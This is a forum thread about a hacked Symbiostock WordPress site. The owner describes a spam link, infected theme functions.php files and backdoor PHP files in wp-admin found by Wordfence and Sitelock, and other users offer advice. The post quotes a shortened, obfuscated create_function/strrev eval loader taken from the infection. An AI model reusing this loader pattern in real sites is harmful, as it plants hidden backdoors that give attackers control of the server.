I haven't checked nor updated my Symbio site for a while, and when I finally did, I found a "viagra" link displayed between the stock site name and image title.
Linked to the following URL: www.xxxpowersconstruction.net/viagra-prices-cvs  (inserted xxx into the name, not to reward this scumbag)

After running Wordfence analysis, that utility reported a number of malicious php files in the wp-content directory.

Critical Problems:
* File appears to be malicious: wp-content/themes/advantica/functions.php
* File appears to be malicious: wp-content/themes/clean-theme-2-0-1-old/functions.php
* File appears to be malicious: wp-content/themes/clean-theme-2-0-1-old2/functions.php
* File appears to be malicious: wp-content/themes/smallbiz/functions.php
* File appears to be malicious: wp-content/themes/symbiostock/functions.php
* File appears to be malicious: wp-content/themes/symbiostock-dragonfly/functions.php
* File appears to be malicious: wp-content/themes/symbiostock-old/functions.php
* File appears to be malicious: wp-content/themes/symbiostock-old2/functions.php
* File appears to be malicious: wp-content/themes/twentyeleven/functions.php

and a few other themes


This is the data found in the php files (I shortened the code disguised as some gibberish shown in bold from about 80 lines to 1 line only - to eliminate any possibility of spreading this virus further):
<?php
$wp_user_functions_init = create_function('$a',strrev(';)a$(lave'));
 $wp_user_functions_init(strrev(')"=oQD9pQD7kiIwhGcf52bpR3YuVnZft2YhJGbsF2YigCdyFGdz9lYvlgCNsXKpcCdyFGdz9lYvdCKzR3cphZoYWa"(edoced_46esab(lave'));
?>

Not knowing much about php code, I deleted ALL the lines in the php files, and that got rid of the offending link, but I wonder if I should have some information in those php files. If symbiostock/functions.php should contain some essential information, please, let me know what it should be.
 
I also wonder how my site got hacked. If my php files got infected through some plugin/theme, by direct attack to my Symbiosite or laterally on my host site.

I hope your getting commissions on that viagara!

Wordfence does a pretty good scan. There's lots of ways the site can get hacked, but a reinstall of WP should help. Being up to date should help too. Change your password, and that should cover it.

UPDATE:

Wordfence (free version) detected the infected php files in Themes only.
However, my host provider (ipower.com) ran subsequently the Sitelock utility that found two types of backdoor code in the following files:

evvy_colby.php: SiteLock-PHP-UPLOADER-1-bt in the home directory

and then JCDEF.Obfus.CreateFunc.BackDoorEval-21. in the following files

/wp-admin/theme-install_new.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/user/menu_infoold.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/maint/repair_ver1.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/network/edit_indesit.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/js/common.min_bck_old.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/css/colors/_mixins_new.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/css/colors/light/colors_infoold.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/css/colors/blue/colors-rtl.min_noversion.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/css/colors/coffee/colors-rtl.min_prevv1.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/includes/export_bck_old.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.

Looking at the site stats, I saw over 500 hits at the login.php in the last two weeks (I didn't log in at all), but I doubt that they cracked the password (I changed it anyway).

If this infection happened indeed through Yoast SEO, there is a good chance that my site was not the only one compromised Symbiostock site.
You might want to check your site also for the above files (plus the functions.php in Themes).
 

I just got some more information from ipower.

They don't think the hack came from Yoast or within their network, but possibly from a script hack in another plugin or through FTP. I doubt that it came from my computer, since I haven't accessed my Symbiostock site for a long time.
The lesson is not to rely just on the Wordfence, but run also Sitelock or some other similar tools, or check manually in the previously mentioned directories for suspicious back door php files.